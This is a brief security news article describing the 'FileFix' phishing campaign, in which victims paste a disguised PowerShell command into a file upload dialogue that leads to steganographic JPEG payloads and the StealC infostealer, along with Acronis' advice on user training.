FileFix attack tricks users into opening infected images

A new social engineering attack, dubbed “FileFix,” has been uncovered by Acronis’ Threat Research Unit. This sophisticated campaign is a refined version of traditional ClickFix attacks, where threat actors manipulate victims into executing malicious commands and installing malware on their devices. Unlike previous methods that relied on fake CAPTCHA prompts or Windows Run dialogues, FileFix exploits file upload interfaces on phishing websites. The attack initiates when users visit convincing phishing sites that impersonate legitimate platforms, such as Facebook Security. Victims are misled into pasting what appears to be a file system path into a file selector dialogue box. In reality, this “file path” is an obfuscated Microsoft PowerShell script that executes immediately upon being pasted, relying on the user’s own actions to launch the malware.

Once the initial PowerShell payload is executed, it downloads malicious JPEG images containing malware code embedded through steganographic techniques. This method conceals a secondary script with executable payloads encrypted with RC4, allowing multiple files to be hidden within a single image. The PowerShell script then extracts and executes the concealed code from these seemingly harmless images. The final stage deploys a Go-based loader that conducts environment checks before launching StealC, an information-stealing malware. Acronis has observed multiple variants of this attack emerging within a two-week timeframe, supported by a global infrastructure that spans multiple countries. To mitigate the risks, Acronis recommends user education and training to help individuals recognise suspicious copy-and-paste operations on their computers.